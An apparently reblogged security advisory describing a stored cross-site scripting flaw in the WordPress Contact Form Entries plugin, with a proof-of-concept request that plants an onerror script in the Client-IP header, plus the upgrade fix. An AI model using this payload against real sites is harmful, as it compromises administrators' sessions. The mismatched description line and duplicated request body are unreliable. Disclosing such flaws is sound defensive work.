WordPress CRM Form Entries Cross-Site Scripting

WordPress CRM Form Entries versions prior to 1.1.7 appear susceptible to a cross site scripting vulnerability.

# Description:
WordPress before 5.2.3 allows XSS in post previews by authenticated users.




# Technical Details and Exploitation:
CRM Form Entries CRM is vulnerable to a Stored XSS in Client IP field.
When the user uploads a new form, CRM Form Entries checks for the client IP
in order to save information about the user:
===============================================================================================================
public function get_ip(),
wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388
==============================================================================================================
The user can set an arbitrary "HTTP_CLIENT_IP" value, and the value is
stored inside the database.


# Proof Of Concept:

Suppose that you have a Contact Form, intercept the POST request and insert
the following Client-IP header
===============================================================================================================
POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback
HTTP/1.1
Host: dsp.com:11080
Content-Length: 1411
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ...
Client-IP: <img src=a onerror=alert(1)>

------WebKitFormBoundaryCuNGXLnhRsdglEAx

Content-Disposition: form-data; name="_wpcf7"

10
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_version"

5.3.1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_locale"

en_US
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_unit_tag"

wpcf7-f10-p13-o1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_container_post"

Content-Disposition: form-data; name="_wpcf7"

10
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_version"

5.3.1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_locale"

en_US
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_unit_tag"

wpcf7-f10-p13-o1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_container_post"
...
===============================================================================================================
The request is acccepted, and the code navigates the section
$_SERVER['HTTP_CLIENT_IP']  , ip is injected and saved inside the database.
When the administrator clicks on the entry element in the plugin, the XSS
is triggered.


# Solution:
Upgrade Contact Form Entries to version 1.1.7

Return to real infosecurity exploit-db

• About
• Latest Posts

Connect

RiSec.n0tst3

Hello! I'm Steve, an independent security researcher, and analyst from Scotland, UK.

I've had an avid interest in Computers, Technology and Security since my early teens. 20 years on, and, it's a whole lot more complicated...

I've assisted Governments, Individuals and Organizations throughout the world. Including; US DOJ, NHS UK, GOV UK.

I'll often reblog infosec-related articles that I find interesting. On the RiSec website, You'll also find a variety of write-ups, tutorials and much more!

Connect

Latest posts by RiSec.n0tst3 (see all)

• Twitter discontinues text message two-factor authentication for non-Blue subscribers - 26 March 2023
• A Beginner’s Guide to Visual Studio Code: Interface, Features, Keyboard Shortcuts and More - 25 March 2023
• A Lesson in Privacy: The ChatGPT Bug and Its Implications for AI Conversations - 24 March 2023

Recommended:  ‘CosMiss’ vulnerability found in Microsoft Azure developer tool